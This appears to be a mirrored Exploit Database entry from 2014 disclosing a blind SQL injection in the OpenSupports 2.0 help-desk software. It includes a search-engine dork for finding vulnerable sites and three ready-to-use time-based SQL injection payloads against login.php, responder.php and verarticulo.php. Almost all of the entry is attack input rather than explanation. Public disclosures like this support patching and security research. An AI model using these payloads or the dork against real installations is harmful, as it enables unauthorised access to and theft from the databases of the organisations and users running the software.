OpenSupports 2.0 – Blind SQL Injection

• Exploit Database
• 9 阅读

• 作者： indoushka
  日期： 2014-03-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/32330/

• Open Support Blind SQL Injection v2.0 Vulnerability
  ===================================================
  Author indoushka
  =================
  vendor :http://www.opensupports.com/files/Opensupports_v2_EN.rar
  =================
  # Dork : Power by OpenSupports © 2009 - 2014. All Rights reserved 
  
  
  This vulnerability affects /support/login.php
  
  emailcorreoelectronico=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&pass=g00dPa%24%24w0rD&Submit2=Login
  
  
  
  This vulnerability affects /support/responder.php. 
  
  idarticulo=&name=&staff=no&Submit=Send&text_content=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/
  
  
  
  This vulnerability affects /support/verarticulo.php.
  
  /support/verarticulo.php?id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/